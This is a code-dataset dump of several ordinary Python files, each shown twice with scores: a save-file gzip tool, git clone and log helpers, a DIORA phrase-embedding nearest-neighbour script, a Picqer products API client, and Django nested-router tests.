print('Closing this prompt in 10 seconds')
time.sleep(10)
with open("save.json", "r") as stream:
    data = compress(stream.read())
with open("out.gzip", "wb") as stream:
stream.write(data) | tools/save_gzipper.py | import gzip
import io
import json
import time
import sys
def decompress(inputBytes):
with io.BytesIO() as bio:
with io.BytesIO(inputBytes) as stream:
decompressor = gzip.GzipFile(fileobj=stream, mode='r')
while True: # until EOF
chunk = decompressor.read(8192)
if not chunk:
decompressor.close()
bio.seek(0)
return bio.read().decode("utf-8")
bio.write(chunk)
return None
def compress(inputString):
with io.BytesIO() as bio:
bio.write(inputString.encode("utf-8"))
bio.seek(0)
with io.BytesIO() as stream:
compressor = gzip.GzipFile(fileobj=stream, mode='w')
while True: # until EOF
chunk = bio.read(8192)
if not chunk: # EOF?
compressor.close()
return stream.getvalue()
compressor.write(chunk)
if __name__ == "__main__":
    if len(sys.argv) >= 2:
fn = ' '.join(sys.argv[1:])
ext = fn.split('.')[-1]
try:
with open(fn, "rb") as ifstream:
if ext == 'json':
print(f'Compressing "{fn}"')
data = compress(ifstream.read().decode('utf-8'))
with open(".".join(fn.split(".")[:-1]) + ".gzip", "wb") as ofstream:
ofstream.write(data)
print('Done')
elif ext == 'gzip':
print(f'Decompressing "{fn}"')
data = decompress(ifstream.read())
with open(".".join(fn.split(".")[:-1]) + ".json", "w", encoding="utf-8") as ofstream:
ofstream.write(data)
print('Done')
else:
print(f'Unknown file type "{ext}"')
except:
print(f'Error opening file "{fn}"')
else:
        print('Please drag and drop either a .json or .gzip file onto save_gzipper.py to compress/decompress it')
print('Closing this prompt in 10 seconds')
time.sleep(10)
with open("save.json", "r") as stream:
    data = compress(stream.read())
with open("out.gzip", "wb") as stream:
stream.write(data) | 0.144239 | 0.072112 |
import os
import re
def update_repository_name(repository):
"""Update given repository name so it won't contain any prefix(es)."""
lastSlash = repository.rfind("/")
# make sure we use just the repo name
if lastSlash >= 0 and lastSlash < len(repository) - 1:
return repository[1 + lastSlash:]
else:
return repository
def is_repository_cloned(repository):
"""Check if the directory with cloned repository exist."""
return os.path.isdir("repositories/" + update_repository_name(repository))
def clone_repository(repository, full_history):
"""Clone the selected repository."""
print("Cloning the repository {repository}".format(repository=repository))
prefix = "https://github.com"
if full_history:
cmd = "pushd repositories; git clone {prefix}/{repo}.git; popd".\
format(prefix=prefix, repo=repository)
else:
cmd = "pushd repositories; git clone --single-branch --depth 1 {prefix}/{repo}.git; popd".\
format(prefix=prefix, repo=repository)
os.system(cmd)
def fetch_repository(repository):
"""Fetch the selected repository."""
repository = update_repository_name(repository)
print("Fetching changes from the repository {repository}".format(repository=repository))
command = "pushd repositories/{repository}; git fetch; popd".format(repository=repository)
os.system(command)
def clone_or_fetch_repository(repository, full_history=False):
"""Clone or fetch the selected repository."""
if is_repository_cloned(repository):
# make sure we don't have detached head
checkout(repository, "master")
fetch_repository(repository)
else:
clone_repository(repository, full_history)
def create_log(repository):
"""Retrieve the log for the given repository."""
repository = update_repository_name(repository)
command = ("pushd repositories/{repo} >> /dev/null; " +
"git log --pretty=oneline > ../logs.txt; " +
"popd >> /dev/null").format(repo=repository)
os.system(command)
def read_all_commits(filename):
"""Read all commits from the given GIT log file."""
commits = []
with open(filename) as fin:
for line in fin:
splitted = line.strip().split(" ", 1)
commits.append(splitted)
commits.reverse()
return commits
def read_commits(filename, pattern):
"""Read commits from the given GIT log file that pass the selected pattern."""
commits = read_all_commits(filename)
# filter commits
return [commit for commit in commits if re.fullmatch(pattern, commit[1])]
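# Hedged usage sketch; the repository slug and the commit-message pattern are examples
# only. create_log() above redirects the git log to repositories/logs.txt relative to
# the current working directory, which is the file read_commits() is pointed at here.
def _example_release_commits(repository="org/example-repo"):
    clone_or_fetch_repository(repository)
    create_log(repository)
    # keep only commits whose whole message looks like a version tag, e.g. "1.2.3"
    return read_commits("repositories/logs.txt", r"\d+\.\d+\.\d+")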
def checkout(repository, commit):
"""Perform the GIT checkout in the selected repository."""
repository = update_repository_name(repository)
command = ("pushd repositories/{repo} >> /dev/null; " +
"git checkout {commit}; " +
"popd >> /dev/null").format(repo=repository, commit=commit)
os.system(command) | dashboard/src/git_utils.py |
import os
import re
def update_repository_name(repository):
"""Update given repository name so it won't contain any prefix(es)."""
lastSlash = repository.rfind("/")
# make sure we use just the repo name
if lastSlash >= 0 and lastSlash < len(repository) - 1:
return repository[1 + lastSlash:]
else:
return repository
def is_repository_cloned(repository):
"""Check if the directory with cloned repository exist."""
return os.path.isdir("repositories/" + update_repository_name(repository))
def clone_repository(repository, full_history):
"""Clone the selected repository."""
print("Cloning the repository {repository}".format(repository=repository))
prefix = "https://github.com"
if full_history:
cmd = "pushd repositories; git clone {prefix}/{repo}.git; popd".\
format(prefix=prefix, repo=repository)
else:
cmd = "pushd repositories; git clone --single-branch --depth 1 {prefix}/{repo}.git; popd".\
format(prefix=prefix, repo=repository)
os.system(cmd)
def fetch_repository(repository):
"""Fetch the selected repository."""
repository = update_repository_name(repository)
print("Fetching changes from the repository {repository}".format(repository=repository))
command = "pushd repositories/{repository}; git fetch; popd".format(repository=repository)
os.system(command)
def clone_or_fetch_repository(repository, full_history=False):
"""Clone or fetch the selected repository."""
if is_repository_cloned(repository):
# make sure we don't have detached head
checkout(repository, "master")
fetch_repository(repository)
else:
clone_repository(repository, full_history)
def create_log(repository):
"""Retrieve the log for the given repository."""
repository = update_repository_name(repository)
command = ("pushd repositories/{repo} >> /dev/null; " +
"git log --pretty=oneline > ../logs.txt; " +
"popd >> /dev/null").format(repo=repository)
os.system(command)
def read_all_commits(filename):
"""Read all commits from the given GIT log file."""
commits = []
with open(filename) as fin:
for line in fin:
splitted = line.strip().split(" ", 1)
commits.append(splitted)
commits.reverse()
return commits
def read_commits(filename, pattern):
"""Read commits from the given GIT log file that pass the selected pattern."""
commits = read_all_commits(filename)
# filter commits
return [commit for commit in commits if re.fullmatch(pattern, commit[1])]
def checkout(repository, commit):
"""Perform the GIT checkout in the selected repository."""
repository = update_repository_name(repository)
command = ("pushd repositories/{repo} >> /dev/null; " +
"git checkout {commit}; " +
"popd >> /dev/null").format(repo=repository, commit=commit)
os.system(command) | 0.523908 | 0.093844 |
import json
import types
import itertools
import torch
import numpy as np
from train import argument_parser, parse_args, configure
from train import get_validation_dataset, get_validation_iterator
from train import build_net
from diora.logging.configuration import get_logger
try:
import faiss
from faiss import normalize_L2
except:
print('Could not import `faiss`, which is used to find nearest neighbors.')
def get_cell_index(entity_labels, i_label=0, i_pos=1, i_size=2):
def helper():
for i, lst in enumerate(entity_labels):
for el in lst:
if el is None:
continue
pos = el[i_pos]
size = el[i_size]
label = el[i_label]
yield (i, pos, size, label)
lst = list(helper())
if len(lst) == 0:
        return [], [], [], []
batch_index = [x[0] for x in lst]
positions = [x[1] for x in lst]
sizes = [x[2] for x in lst]
labels = [x[3] for x in lst]
return batch_index, positions, sizes, labels
def get_many_cells(diora, chart, batch_index, positions, sizes):
cells = []
length = diora.length
idx = []
for bi, pos, size in zip(batch_index, positions, sizes):
level = size - 1
offset = diora.index.get_offset(length)[level]
absolute_pos = offset + pos
idx.append(absolute_pos)
cells = chart[batch_index, idx]
return cells
def get_many_phrases(batch, batch_index, positions, sizes):
batch = batch.tolist()
lst = []
for bi, pos, size in zip(batch_index, positions, sizes):
phrase = tuple(batch[bi][pos:pos+size])
lst.append(phrase)
return lst
class BatchRecorder(object):
def __init__(self, dtype={}):
super(BatchRecorder, self).__init__()
self.cache = {}
self.dtype = dtype
self.dtype2flatten = {
'list': self._flatten_list,
'np': self._flatten_np,
'torch': self._flatten_torch,
}
def _flatten_list(self, v):
return list(itertools.chain(*v))
def _flatten_np(self, v):
return np.concatenate(v, axis=0)
def _flatten_torch(self, v):
return torch.cat(v, 0).cpu().data.numpy()
def get_flattened_result(self):
def helper():
for k, v in self.cache.items():
flatten = self.dtype2flatten[self.dtype.get(k, 'list')]
yield k, flatten(v)
return {k: v for k, v in helper()}
def record(self, **kwargs):
for k, v in kwargs.items():
self.cache.setdefault(k, []).append(v)
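# Hedged sketch of how BatchRecorder above is used: record per-batch values, then flatten
# them according to the declared dtypes. The keys, shapes and values are arbitrary examples.
def _batch_recorder_demo():
    recorder = BatchRecorder(dtype={'ids': 'list', 'vecs': 'np'})
    for start in (0, 2):
        recorder.record(ids=[start, start + 1], vecs=np.ones((2, 4)))
    flat = recorder.get_flattened_result()
    return flat['ids'], flat['vecs'].shape  # ([0, 1, 2, 3], (4, 4))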
class Index(object):
def __init__(self, dim=None):
super(Index, self).__init__()
self.D, self.I = None, None
self.index = faiss.IndexFlatIP(dim)
def add(self, vecs):
self.index.add(vecs)
def cache(self, vecs, k):
self.D, self.I = self.index.search(vecs, k)
def topk(self, q, k):
for j in range(k):
idx = self.I[q][j]
dist = self.D[q][j]
yield idx, dist
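# Hedged sketch of the Index wrapper above (requires faiss); the dimension, number of
# vectors and k are arbitrary example values.
def _index_demo(dim=16, n=100, k=5):
    vecs = np.random.rand(n, dim).astype('float32')
    normalize_L2(vecs)        # cosine similarity via inner product on unit-norm vectors
    index = Index(dim=dim)
    index.add(vecs)
    index.cache(vecs, k)      # precompute top-k neighbours for every stored vector
    return list(index.topk(0, k))  # [(neighbour_id, score), ...] for the first vector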
class NearestNeighborsLookup(object):
def __init__(self):
super(NearestNeighborsLookup, self).__init__()
def run(options):
logger = get_logger()
validation_dataset = get_validation_dataset(options)
validation_iterator = get_validation_iterator(options, validation_dataset)
word2idx = validation_dataset['word2idx']
embeddings = validation_dataset['embeddings']
idx2word = {v: k for k, v in word2idx.items()}
logger.info('Initializing model.')
trainer = build_net(options, embeddings, validation_iterator)
diora = trainer.net.diora
# 1. Get all relevant phrase vectors.
dtype = {
'example_ids': 'list',
'labels': 'list',
'positions': 'list',
'sizes': 'list',
'phrases': 'list',
'inside': 'torch',
'outside': 'torch',
}
batch_recorder = BatchRecorder(dtype=dtype)
## Eval mode.
trainer.net.eval()
batches = validation_iterator.get_iterator(random_seed=options.seed)
logger.info('Beginning to embed phrases.')
with torch.no_grad():
for i, batch_map in enumerate(batches):
sentences = batch_map['sentences']
batch_size = sentences.shape[0]
length = sentences.shape[1]
# Skips very short examples.
if length <= 2:
continue
_ = trainer.step(batch_map, train=False, compute_loss=False)
entity_labels = batch_map['entity_labels']
batch_index, positions, sizes, labels = get_cell_index(entity_labels)
# Skip short phrases.
batch_index = [x for x, y in zip(batch_index, sizes) if y >= 2]
positions = [x for x, y in zip(positions, sizes) if y >= 2]
labels = [x for x, y in zip(labels, sizes) if y >= 2]
sizes = [y for y in sizes if y >= 2]
cell_index = (batch_index, positions, sizes)
batch_result = {}
batch_result['example_ids'] = [batch_map['example_ids'][idx] for idx in cell_index[0]]
batch_result['labels'] = labels
batch_result['positions'] = cell_index[1]
batch_result['sizes'] = cell_index[2]
batch_result['phrases'] = get_many_phrases(sentences, *cell_index)
batch_result['inside'] = get_many_cells(diora, diora.inside_h, *cell_index)
batch_result['outside'] = get_many_cells(diora, diora.outside_h, *cell_index)
batch_recorder.record(**batch_result)
result = batch_recorder.get_flattened_result()
# 2. Build an index of nearest neighbors.
vectors = np.concatenate([result['inside'], result['outside']], axis=1)
normalize_L2(vectors)
index = Index(dim=vectors.shape[1])
index.add(vectors)
index.cache(vectors, options.k_candidates)
# 3. Print a summary.
example_ids = result['example_ids']
phrases = result['phrases']
assert len(example_ids) == len(phrases)
assert len(example_ids) == vectors.shape[0]
def stringify(phrase):
return ' '.join([idx2word[idx] for idx in phrase])
for i in range(vectors.shape[0]):
topk = []
for j, score in index.topk(i, options.k_candidates):
# Skip same example.
if example_ids[i] == example_ids[j]:
continue
# Skip string match.
if phrases[i] == phrases[j]:
continue
topk.append((j, score))
if len(topk) == options.k_top:
break
assert len(topk) == options.k_top, 'Did not find enough valid candidates.'
# Print.
print('[query] example_id={} phrase={}'.format(
example_ids[i], stringify(phrases[i])))
for rank, (j, score) in enumerate(topk):
print('rank={} score={:.3f} example_id={} phrase={}'.format(
rank, score, example_ids[j], stringify(phrases[j])))
if __name__ == '__main__':
parser = argument_parser()
parser.add_argument('--k_candidates', default=100, type=int)
parser.add_argument('--k_top', default=3, type=int)
options = parse_args(parser)
configure(options)
run(options) | pytorch/diora/scripts/phrase_embed.py | import json
import types
import itertools
import torch
import numpy as np
from train import argument_parser, parse_args, configure
from train import get_validation_dataset, get_validation_iterator
from train import build_net
from diora.logging.configuration import get_logger
try:
import faiss
from faiss import normalize_L2
except:
print('Could not import `faiss`, which is used to find nearest neighbors.')
def get_cell_index(entity_labels, i_label=0, i_pos=1, i_size=2):
def helper():
for i, lst in enumerate(entity_labels):
for el in lst:
if el is None:
continue
pos = el[i_pos]
size = el[i_size]
label = el[i_label]
yield (i, pos, size, label)
lst = list(helper())
if len(lst) == 0:
        return [], [], [], []
batch_index = [x[0] for x in lst]
positions = [x[1] for x in lst]
sizes = [x[2] for x in lst]
labels = [x[3] for x in lst]
return batch_index, positions, sizes, labels
def get_many_cells(diora, chart, batch_index, positions, sizes):
cells = []
length = diora.length
idx = []
for bi, pos, size in zip(batch_index, positions, sizes):
level = size - 1
offset = diora.index.get_offset(length)[level]
absolute_pos = offset + pos
idx.append(absolute_pos)
cells = chart[batch_index, idx]
return cells
def get_many_phrases(batch, batch_index, positions, sizes):
batch = batch.tolist()
lst = []
for bi, pos, size in zip(batch_index, positions, sizes):
phrase = tuple(batch[bi][pos:pos+size])
lst.append(phrase)
return lst
class BatchRecorder(object):
def __init__(self, dtype={}):
super(BatchRecorder, self).__init__()
self.cache = {}
self.dtype = dtype
self.dtype2flatten = {
'list': self._flatten_list,
'np': self._flatten_np,
'torch': self._flatten_torch,
}
def _flatten_list(self, v):
return list(itertools.chain(*v))
def _flatten_np(self, v):
return np.concatenate(v, axis=0)
def _flatten_torch(self, v):
return torch.cat(v, 0).cpu().data.numpy()
def get_flattened_result(self):
def helper():
for k, v in self.cache.items():
flatten = self.dtype2flatten[self.dtype.get(k, 'list')]
yield k, flatten(v)
return {k: v for k, v in helper()}
def record(self, **kwargs):
for k, v in kwargs.items():
self.cache.setdefault(k, []).append(v)
class Index(object):
def __init__(self, dim=None):
super(Index, self).__init__()
self.D, self.I = None, None
self.index = faiss.IndexFlatIP(dim)
def add(self, vecs):
self.index.add(vecs)
def cache(self, vecs, k):
self.D, self.I = self.index.search(vecs, k)
def topk(self, q, k):
for j in range(k):
idx = self.I[q][j]
dist = self.D[q][j]
yield idx, dist
class NearestNeighborsLookup(object):
def __init__(self):
super(NearestNeighborsLookup, self).__init__()
def run(options):
logger = get_logger()
validation_dataset = get_validation_dataset(options)
validation_iterator = get_validation_iterator(options, validation_dataset)
word2idx = validation_dataset['word2idx']
embeddings = validation_dataset['embeddings']
idx2word = {v: k for k, v in word2idx.items()}
logger.info('Initializing model.')
trainer = build_net(options, embeddings, validation_iterator)
diora = trainer.net.diora
# 1. Get all relevant phrase vectors.
dtype = {
'example_ids': 'list',
'labels': 'list',
'positions': 'list',
'sizes': 'list',
'phrases': 'list',
'inside': 'torch',
'outside': 'torch',
}
batch_recorder = BatchRecorder(dtype=dtype)
## Eval mode.
trainer.net.eval()
batches = validation_iterator.get_iterator(random_seed=options.seed)
logger.info('Beginning to embed phrases.')
with torch.no_grad():
for i, batch_map in enumerate(batches):
sentences = batch_map['sentences']
batch_size = sentences.shape[0]
length = sentences.shape[1]
# Skips very short examples.
if length <= 2:
continue
_ = trainer.step(batch_map, train=False, compute_loss=False)
entity_labels = batch_map['entity_labels']
batch_index, positions, sizes, labels = get_cell_index(entity_labels)
# Skip short phrases.
batch_index = [x for x, y in zip(batch_index, sizes) if y >= 2]
positions = [x for x, y in zip(positions, sizes) if y >= 2]
labels = [x for x, y in zip(labels, sizes) if y >= 2]
sizes = [y for y in sizes if y >= 2]
cell_index = (batch_index, positions, sizes)
batch_result = {}
batch_result['example_ids'] = [batch_map['example_ids'][idx] for idx in cell_index[0]]
batch_result['labels'] = labels
batch_result['positions'] = cell_index[1]
batch_result['sizes'] = cell_index[2]
batch_result['phrases'] = get_many_phrases(sentences, *cell_index)
batch_result['inside'] = get_many_cells(diora, diora.inside_h, *cell_index)
batch_result['outside'] = get_many_cells(diora, diora.outside_h, *cell_index)
batch_recorder.record(**batch_result)
result = batch_recorder.get_flattened_result()
# 2. Build an index of nearest neighbors.
vectors = np.concatenate([result['inside'], result['outside']], axis=1)
normalize_L2(vectors)
index = Index(dim=vectors.shape[1])
index.add(vectors)
index.cache(vectors, options.k_candidates)
# 3. Print a summary.
example_ids = result['example_ids']
phrases = result['phrases']
assert len(example_ids) == len(phrases)
assert len(example_ids) == vectors.shape[0]
def stringify(phrase):
return ' '.join([idx2word[idx] for idx in phrase])
for i in range(vectors.shape[0]):
topk = []
for j, score in index.topk(i, options.k_candidates):
# Skip same example.
if example_ids[i] == example_ids[j]:
continue
# Skip string match.
if phrases[i] == phrases[j]:
continue
topk.append((j, score))
if len(topk) == options.k_top:
break
assert len(topk) == options.k_top, 'Did not find enough valid candidates.'
# Print.
print('[query] example_id={} phrase={}'.format(
example_ids[i], stringify(phrases[i])))
for rank, (j, score) in enumerate(topk):
print('rank={} score={:.3f} example_id={} phrase={}'.format(
rank, score, example_ids[j], stringify(phrases[j])))
if __name__ == '__main__':
parser = argument_parser()
parser.add_argument('--k_candidates', default=100, type=int)
parser.add_argument('--k_top', default=3, type=int)
options = parse_args(parser)
configure(options)
run(options) | 0.70304 | 0.32861 |
import requests
from requests.auth import HTTPBasicAuth
from ..resources.resource import Resource
class Products(Resource):
def __init__(self):
super().__init__("products")
def activate_product(self, id):
return requests.post(self.config.base_url + self.path + '/' + str(id),
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_warehouse_settings(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/warehouses",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def update_warehouse_settings(self, product_id, warehouse_id, settings_object):
        return requests.put(self.config.base_url + self.path + "/" + str(product_id) + "/warehouses/" + str(warehouse_id), data=settings_object, verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_images(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/images",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def post_images(self, id, image_object):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/images", data=image_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def delete_image(self, id, image_id):
return requests.delete(self.config.base_url + self.path + '/' + str(id) + "/images/" + str(image_id),
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_locations(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/locations",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def link_product(self, id, link_product_object):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/locations",
data=link_product_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def unlink_product(self, id, location_id):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/locations/" + location_id,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_tag(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/tags",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def post_tag(self, id, tag_object):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/tags",
data=tag_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def remove_tag(self, id, tags_id):
return requests.delete(self.config.base_url + self.path + '/' + str(id) + "/tags/" + tags_id,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_stock(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/stock",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_stock_in_single_warehouse(self, product_id, warehouse_id):
return requests.get(self.config.base_url + self.path + '/' + str(product_id) + "/stock/" + str(warehouse_id),
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def change_stock(self, product_id, warehouse_id, stock_object):
return requests.post(self.config.base_url + self.path + '/' + str(product_id) + "/stock/" + str(warehouse_id),
data=stock_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def move_stock(self, product_id, warehouse_id, stock_object):
return requests.post(
self.config.base_url + self.path + '/' + str(product_id) + "/stock/" + str(warehouse_id) + "/move",
data=stock_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def delete(self, id):
raise NotImplementedError("Not possible to delete a product") | picqer_client_python/resources/products.py | import requests
from requests.auth import HTTPBasicAuth
from ..resources.resource import Resource
class Products(Resource):
def __init__(self):
super().__init__("products")
def activate_product(self, id):
return requests.post(self.config.base_url + self.path + '/' + str(id),
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_warehouse_settings(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/warehouses",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def update_warehouse_settings(self, product_id, warehouse_id, settings_object):
        return requests.put(self.config.base_url + self.path + "/" + str(product_id) + "/warehouses/" + str(warehouse_id), data=settings_object, verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_images(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/images",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def post_images(self, id, image_object):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/images", data=image_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def delete_image(self, id, image_id):
return requests.delete(self.config.base_url + self.path + '/' + str(id) + "/images/" + str(image_id),
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_locations(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/locations",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def link_product(self, id, link_product_object):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/locations",
data=link_product_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def unlink_product(self, id, location_id):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/locations/" + location_id,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_tag(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/tags",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def post_tag(self, id, tag_object):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/tags",
data=tag_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def remove_tag(self, id, tags_id):
return requests.delete(self.config.base_url + self.path + '/' + str(id) + "/tags/" + tags_id,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_stock(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/stock",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_stock_in_single_warehouse(self, product_id, warehouse_id):
return requests.get(self.config.base_url + self.path + '/' + str(product_id) + "/stock/" + str(warehouse_id),
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def change_stock(self, product_id, warehouse_id, stock_object):
return requests.post(self.config.base_url + self.path + '/' + str(product_id) + "/stock/" + str(warehouse_id),
data=stock_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def move_stock(self, product_id, warehouse_id, stock_object):
return requests.post(
self.config.base_url + self.path + '/' + str(product_id) + "/stock/" + str(warehouse_id) + "/move",
data=stock_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def delete(self, id):
raise NotImplementedError("Not possible to delete a product") | 0.347426 | 0.045016 |
from collections import namedtuple
from django.db import models
from django.test import TestCase
from rest_framework.viewsets import ModelViewSet
from rest_framework_nested.routers import SimpleRouter, NestedSimpleRouter
from tests.helpers import get_regex_pattern
def pattern_from_url(url_pattern):
"""
Finds the internal stringified pattern for a URL across
Django versions.
Newer versions of Django use URLPattern, as opposed to
RegexURLPattern.
"""
if hasattr(url_pattern, 'pattern'):
pattern = str(url_pattern.pattern)
elif hasattr(url_pattern._regex, 'pattern'):
pattern = str(url_pattern.regex.pattern)
else:
pattern = url_pattern._regex
return pattern
QS = namedtuple('Queryset', ['model'])
class A(models.Model):
name = models.CharField(max_length=255)
class B(models.Model):
name = models.CharField(max_length=255)
parent = models.ForeignKey(A, on_delete=models.CASCADE)
class C(models.Model):
name = models.CharField(max_length=255)
parent = models.ForeignKey(B, on_delete=models.CASCADE)
class AViewSet(ModelViewSet):
lookup_value_regex = '[0-9a-f]{32}'
model = A
queryset = QS(A)
class BViewSet(ModelViewSet):
model = B
queryset = QS(B)
class CViewSet(ModelViewSet):
model = C
queryset = QS(C)
class TestNestedSimpleRouter(TestCase):
def setUp(self):
self.router = SimpleRouter()
self.router.register(r'a', AViewSet)
self.a_router = NestedSimpleRouter(self.router, r'a', lookup='a')
self.a_router.register(r'b', BViewSet)
self.b_router = NestedSimpleRouter(self.a_router, r'b', lookup='b')
self.b_router.register(r'c', CViewSet)
def test_recursive_nested_simple_routers(self):
self.assertFalse(hasattr(self.router, 'parent_regex'))
urls = self.router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^a/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^a/(?P<pk>[0-9a-f]{32})/$')
self.assertEqual(self.a_router.parent_regex, u'a/(?P<a_pk>[0-9a-f]{32})/')
urls = self.a_router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/(?P<pk>[^/.]+)/$')
self.assertEqual(self.b_router.parent_regex, u'a/(?P<a_pk>[0-9a-f]{32})/b/(?P<b_pk>[^/.]+)/')
urls = self.b_router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/(?P<b_pk>[^/.]+)/c/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/(?P<b_pk>[^/.]+)/c/(?P<pk>[^/.]+)/$')
class TestEmptyPrefix(TestCase):
def setUp(self):
self.router = SimpleRouter()
self.router.register(r'', AViewSet)
self.a_router = NestedSimpleRouter(self.router, r'', lookup='a')
self.a_router.register(r'b', BViewSet)
def test_empty_prefix(self):
urls = self.router.urls
urls = self.a_router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^(?P<a_pk>[0-9a-f]{32})/b/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^(?P<a_pk>[0-9a-f]{32})/b/(?P<pk>[^/.]+)/$')
class TestBadLookupValue(TestCase):
def setUp(self):
self.router = SimpleRouter()
self.router.register(r'parents', AViewSet, base_name='ui-parent_1')
def test_bad_lookup(self):
with self.assertRaises(ValueError):
self.a_router = NestedSimpleRouter(self.router, r'parents', lookup='ui-parent_2')
self.a_router.register(r'child', BViewSet, base_name='ui-parent-child')
class TestRouterSettingInheritance(TestCase):
"""
Ensure that nested routers inherit the trailing_slash option from
their parent unless explicitly told not to.
note: drf transforms the boolean from the kwargs into an internal
    pattern string, so it is required to test these values instead of
the boolean.
trailing_slash=True -> '/'
trailing_slash=False -> ''
trailing_slash should
- always give priority to the value explicitly defined on the router
- if inherited, use the trailing slash exactly as set in the parent
"""
def _assertHasTrailingSlash(self, router):
self.assertEqual(router.trailing_slash, u'/', "router does not have trailing slash when it should")
self.assertTrue(pattern_from_url(router.urls[0]).endswith('/$'),
"router created url without trailing slash when it should have")
def _assertDoesNotHaveTrailingSlash(self, router):
self.assertEqual(router.trailing_slash, u'', "router has trailing slash when it should not")
self.assertFalse(pattern_from_url(router.urls[0]).endswith('/$'),
"router created url with trailing slash when it should not have")
def test_inherits_no_trailing_slash(self):
"""
Test whether the trailing_slash=False value is inherited when it
is unspecified on the nested router.
"""
router = SimpleRouter(trailing_slash=False)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a')
a_router.register('b', BViewSet)
self._assertDoesNotHaveTrailingSlash(a_router)
def test_inherits_trailing_slash(self):
"""
        Test whether the trailing_slash=True value is inherited when it
is unspecified on the nested router.
"""
router = SimpleRouter(trailing_slash=True)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a')
a_router.register('b', BViewSet)
self._assertHasTrailingSlash(a_router)
def test_explicit_no_trailing_slash(self):
router = SimpleRouter(trailing_slash=True)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a', trailing_slash=False)
a_router.register('b', BViewSet)
self._assertDoesNotHaveTrailingSlash(a_router)
def test_explicit_trailing_slash(self):
"""
Test whether the trailing_slash=False value is properly overridden when setting
trailing_slash=True on the nested router.
"""
router = SimpleRouter(trailing_slash=False)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a', trailing_slash=True)
a_router.register('b', BViewSet)
self._assertHasTrailingSlash(a_router)
def test_inherits_nonstandard_trailing_slash(self):
"""
Test whether the trailing_slash attribute, when set with a custom value,
        is inherited by the nested router.
"""
router = SimpleRouter()
router.trailing_slash = '/?'
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a')
a_router.register('b', BViewSet)
self.assertEqual(a_router.trailing_slash, u'/?', "router does not have trailing slash when it should")
self.assertTrue(pattern_from_url(a_router.urls[0]).endswith('/?$'),
"router created url without trailing slash when it should have") | tests/test_routers.py | from collections import namedtuple
from django.db import models
from django.test import TestCase
from rest_framework.viewsets import ModelViewSet
from rest_framework_nested.routers import SimpleRouter, NestedSimpleRouter
from tests.helpers import get_regex_pattern
def pattern_from_url(url_pattern):
"""
Finds the internal stringified pattern for a URL across
Django versions.
